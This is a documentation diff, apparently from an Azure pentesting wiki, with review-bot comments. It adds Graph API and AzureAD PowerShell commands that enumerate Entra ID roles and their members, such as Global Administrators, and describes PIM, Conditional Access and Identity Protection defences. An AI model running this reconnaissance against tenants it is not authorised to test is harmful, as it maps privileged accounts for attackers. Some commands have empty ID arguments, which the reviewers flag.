@@ -793,6 +776,59 @@ $RequestParams = @{ {% endtab %} {% endtabs %} +### Entra ID Roles + +For more information about Azure roles check: + +{% content-ref url="../az-basic-information/" %} +[az-basic-information](../az-basic-information/) +{% endcontent-ref %} + +{% tabs %} +{% tab title="az cli" %} +{% code overflow="wrap" %} +```bash +# List temaplte roles +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/directoryRoleTemplates" + +# List enabled built-in roles +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/directoryRoles" + +# List all roles with their permissions (including custom roles) +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" + +# List only custom roles +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)' + +# List members of a role +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/directoryRoles//members" +``` +{% endcode %} +{% endtab %} + +{% tab title="Azure AD" %} +```powershell +# Get all available role templates +Get-AzureADDirectoryroleTemplate +# Get enabled roles (Assigned roles) +Get-AzureADDirectoryRole +Get-AzureADDirectoryRole -ObjectId #Get info about the role +# Get custom roles - use AzureAdPreview +Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName +# Users assigned a role (Global Administrator) +Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember +Get-AzureADDirectoryRole -ObjectId | fl +# Roles of the Administrative Unit (who has permissions over the administrative unit and its members) +Get-AzureADMSScopedRoleMembership -Id | fl * +``` +{% endtab %} +{% endtabs %} + ### Devices {% tabs %} 
@@ -866,21 +902,57 @@ Get-AzureADMSScopedRoleMembership -Id | fl #Get role ID and role members {% endtab %} {% endtabs %} -## Azure AD Identity Protection (AIP) +## Privilege Escalation + +{% content-ref url="../az-privilege-escalation/" %} +[az-privilege-escalation](../az-privilege-escalation/) +{% endcontent-ref %} + +## Defensive Mechanisms + +### Privileged Identity Management (PIM) + +Privileged Identity Management (PIM) in Azure helps to **prevent excessive privileges** to being assigned to users unnecessarily. + +One of the main features provided by PIM is that It allows to not assign roles to principals that are constantly active, but make them **eligible for a period of time (e.g. 6months)**. Then, whenever the user wants to activate that role, he needs to ask for it indicating the time he needs the privilege (e.g. 3 hours). Then an **admin needs to approve** the request.\ +Note that the user will also be able to ask to **extend** the time. + +Moreover, **PIM send emails** whenever a privileged role is being assigned to someone. + +
+ +### Conditional Access Policies + +Check: + +{% content-ref url="../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md" %} +[az-conditional-access-policies-mfa-bypass.md](../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md) +{% endcontent-ref %} + +### Entra Identity Protection + +Entra Identity Protection is a security service that allows to **detect when a user or a sign-in is too risky** to be accepted, allowing to **block** the user or the sig-in attempt. + +It allows the admin to configure it to **block** attempts when the risk is "Low and above", "Medium and above" or "High". Although, by default it's completely **disabled**: + +
+ +{% hint style="success" %} +Nowadays it's recommended to add these restrictions via Conditional Access policies where it's possible to configure the same options. +{% endhint %} -Azure AD Identity Protection (AIP) is a security service that uses **automated detection and remediation to help protect user identities in Azure Active Directory from being compromised**. AIP continuously monitors and assesses the risk of user sign-ins and identity configurations, **automatically applying appropriate security measures**, such as requiring multi-factor authentication or blocking potentially dangerous activities. This helps organizations prevent identity-based security breaches. +## Entra Password Protection -Flow: +Entra Password Protection ([https://portal.azure.com/#view/Microsoft\_AAD\_ConditionalAccess/PasswordProtectionBlade](https://portal.azure.com/#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade)) is a security feature that **helps prevent the abuse of weak passwords in by locking out accounts when several unsuccessful login attempts happen**.\ +It also allows to **ban a custom password list** that you need to provide. -1. Azure AD Identity Protection **monitors user activities** and collects data on user **sign-ins, authentication** events, and other relevant activities. -2. The service uses **machine learning** algorithms to analyze this data and detect potential security threats. -3. Azure AD Identity Protection **assigns a level of risk to the threat** (e.g. sign-in) and generate an alert if needed to perform some automatic action. +It can be **applied both** at the cloud level and on-premises Active Directory. -## Azure AD Password Protection (APP) +The default mode is **Audit**: -Azure AD Password Protection (APP) is a security feature that **helps prevent weak passwords in Azure Active Directory by enforcing strong password policies**. 
APP blocks **commonly used weak passwords** and their variants, reducing the risk of password-related breaches. It can be applied both at the cloud level and on-premises Active Directory, enhancing overall password security across the organization. +
-### References +## References * [https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units](https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units)
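Review bot: grammar in the reworded sentence of the `@@ -698,7 +698,7 @@` hunk: "a list of commonly used App IDs that belongs to Microsoft" should read "App IDs that belong to Microsoft". The added "commonly used" qualifier is a good correction, since the linked anchor (`#application-ids-of-commonly-used-microsoft-applications`) is explicitly a list of common first-party apps rather than an exhaustive one.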
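Review bot: the role-id placeholders in the new Entra ID Roles section (`@@ -793,6 +776,59 @@`) come out empty: `--uri "https://graph.microsoft.com/v1.0/directoryRoles//members"` has an empty path segment where the directoryRole object id belongs, and `Get-AzureADDirectoryRole -ObjectId` and `Get-AzureADMSScopedRoleMembership -Id` are invoked with no argument; use a visible placeholder such as `{role-id}` (angle-bracket placeholders may have been stripped as HTML). Three smaller points: the intro "For more information about Azure roles check:" is copied from the Azure Roles section and should say Entra ID roles; "# List temaplte roles" should be "template"; and the "Azure AD" tab depends on the deprecated AzureAD PowerShell module, so either note that or add the Microsoft Graph PowerShell equivalents next to the `az rest` Graph calls, which already target the same `directoryRoles` and `roleManagement/directory/roleDefinitions` endpoints.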
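Review bot: heading level is inconsistent in the last hunk (`@@ -866,21 +902,57 @@`): `+## Entra Password Protection` is level 2 while its siblings `+### Privileged Identity Management (PIM)`, `+### Conditional Access Policies` and `+### Entra Identity Protection` are level 3 under `+## Defensive Mechanisms`; make it `### Entra Password Protection` so it stays inside that section. Two accuracy points: in the PIM paragraph, "Then an **admin needs to approve** the request" only holds when the role's activation settings require approval, so "may need to approve (if the role requires it)" is more accurate; and the Password Protection paragraph now describes only the lockout behaviour and the custom banned list, dropping the Microsoft-maintained global banned password list that the removed APP text ("blocks **commonly used weak passwords** and their variants") covered, which is the feature's core function. Grammar: "prevent excessive privileges to being assigned" should be "from being assigned", "It allows" should be "it allows", "6months" should be "6 months", "PIM send emails" should be "PIM sends emails", "sig-in" should be "sign-in", and "weak passwords in by locking out" has a stray "in".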